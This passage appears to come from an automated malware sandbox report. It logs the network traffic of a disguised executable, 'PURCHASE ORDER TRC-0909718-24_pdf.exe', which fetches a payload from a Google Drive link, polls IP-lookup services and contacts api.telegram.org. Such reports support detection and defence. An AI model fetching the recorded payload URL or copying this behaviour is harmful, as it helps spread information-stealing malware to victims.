Dec 17, 2024 03:29:55.625483990 CET	192.168.2.4	1.1.1.1	0xd23	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Dec 17, 2024 03:30:19.956463099 CET	192.168.2.4	1.1.1.1	0x9924	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 17, 2024 03:29:37.961224079 CET	1.1.1.1	192.168.2.4	0xb9ae	No error (0)	drive.google.com		142.250.186.174	A (IP address)	IN (0x0001)	false
Dec 17, 2024 03:29:40.256015062 CET	1.1.1.1	192.168.2.4	0x7917	No error (0)	drive.usercontent.google.com		142.250.185.193	A (IP address)	IN (0x0001)	false
Dec 17, 2024 03:29:45.067511082 CET	1.1.1.1	192.168.2.4	0x844c	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 03:29:45.067511082 CET	1.1.1.1	192.168.2.4	0x844c	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Dec 17, 2024 03:29:45.067511082 CET	1.1.1.1	192.168.2.4	0x844c	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Dec 17, 2024 03:29:45.067511082 CET	1.1.1.1	192.168.2.4	0x844c	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Dec 17, 2024 03:29:45.067511082 CET	1.1.1.1	192.168.2.4	0x844c	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Dec 17, 2024 03:29:45.067511082 CET	1.1.1.1	192.168.2.4	0x844c	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Dec 17, 2024 03:29:48.111742020 CET	1.1.1.1	192.168.2.4	0x1f10	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Dec 17, 2024 03:29:48.111742020 CET	1.1.1.1	192.168.2.4	0x1f10	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Dec 17, 2024 03:29:55.850902081 CET	1.1.1.1	192.168.2.4	0xd23	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Dec 17, 2024 03:30:20.181792021 CET	1.1.1.1	192.168.2.4	0x9924	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49738	193.122.130.0	80	7716	C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 03:29:45.192862034 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 17, 2024 03:29:47.162818909 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 02:29:47 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: dc6bbe3aedd11b73b6c769bcb795eec4 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 17, 2024 03:29:47.167257071 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 17, 2024 03:29:47.490616083 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 02:29:47 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 581f384b42c7e42fc6e02c2a3f8e0c4d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 17, 2024 03:29:55.298147917 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 17, 2024 03:29:55.619884968 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 02:29:55 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d01a076b1ae90b25cf3b4974c261c6d3 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49748	193.122.130.0	80	7716	C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 03:29:58.150279999 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 17, 2024 03:29:59.247704983 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 02:29:59 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b16027745ed8cfc384a76b3deebca4b0 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49755	193.122.130.0	80	7716	C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 03:30:01.341950893 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 17, 2024 03:30:12.433202982 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 02:30:12 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a60bb8f1eea81a8e5a02937dd777ebfe Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49787	193.122.130.0	80	7716	C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 03:30:14.571630955 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 17, 2024 03:30:19.952058077 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 02:30:19 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5c5855a7290b1b1df5a472c0d78075ab Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49809	193.122.130.0	80	7716	C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 03:30:22.349205017 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 17, 2024 03:30:23.850805998 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 02:30:23 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 165f421089f2cd108923788c4b0dba4a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49820	193.122.130.0	80	7716	C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 03:30:26.101749897 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 17, 2024 03:30:28.780415058 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 02:30:28 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a6d40eacd2299c57e75a0d5a0ebf370f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49833	193.122.130.0	80	7716	C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 03:30:30.952403069 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 17, 2024 03:30:33.184701920 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 02:30:33 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 3d7cd189bb5732fb8991c1aa6d2f2ba9 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49845	193.122.130.0	80	7716	C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 03:30:35.403019905 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 17, 2024 03:30:36.499257088 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 02:30:36 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 894b6d1cf6c87d5fce33fc8ccd6ae861 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49856	193.122.130.0	80	7716	C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 03:30:38.645919085 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 17, 2024 03:30:41.932009935 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 02:30:41 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: af4d26ddc1a430103d38d2f6c019d473 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49869	193.122.130.0	80	7716	C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 03:30:44.186748981 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 17, 2024 03:30:46.649015903 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 02:30:46 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d322aa0f8ec19fa56142ce99ee9d7065 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49880	193.122.130.0	80	7716	C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 03:30:48.775249004 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 17, 2024 03:30:49.871965885 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 02:30:49 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 634e073cefb708972cc62ae07a8e6bbe Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49891	193.122.130.0	80	7716	C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 03:30:52.077415943 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 17, 2024 03:30:54.273268938 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 02:30:54 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 427a7dd535e947f004c274dcd3059e0b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49901	193.122.130.0	80	7716	C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 03:30:56.406482935 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 17, 2024 03:30:58.549431086 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 02:30:58 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1db9f2d34e520a6a61aeea9e2b601167 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49913	193.122.130.0	80	7716	C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 03:31:00.720274925 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 17, 2024 03:31:03.529387951 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 02:31:03 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ddff9ba170265ed649b82b3d3e4b9102 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	142.250.186.174	443	7716	C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 02:29:39 UTC	216	OUT	GET /uc?export=download&id=1Juh7AeT-lysRqJEoEbbuZIeXvcWeNVKy HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache
2024-12-17 02:29:40 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 17 Dec 2024 02:29:39 GMT Location: https://drive.usercontent.google.com/download?id=1Juh7AeT-lysRqJEoEbbuZIeXvcWeNVKy&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'nonce-tbgWKcttRspVE-wfQktq3w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	142.250.185.193	443	7716	C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 02:29:41 UTC	258	OUT	GET /download?id=1Juh7AeT-lysRqJEoEbbuZIeXvcWeNVKy&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-12-17 02:29:44 UTC	4944	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AFiumC7GcukGBVc7iSB-9UWX87LaEbGIa0xVSjfZi9QEPv5NVv1xSAqR3KCYtL7GbybkM2yU Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="ZoddIgjccgVZcWoJPwNBJ172.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 94272 Last-Modified: Mon, 16 Dec 2024 21:03:38 GMT Date: Tue, 17 Dec 2024 02:29:43 GMT Expires: Tue, 17 Dec 2024 02:29:43 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=hYU8PA== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
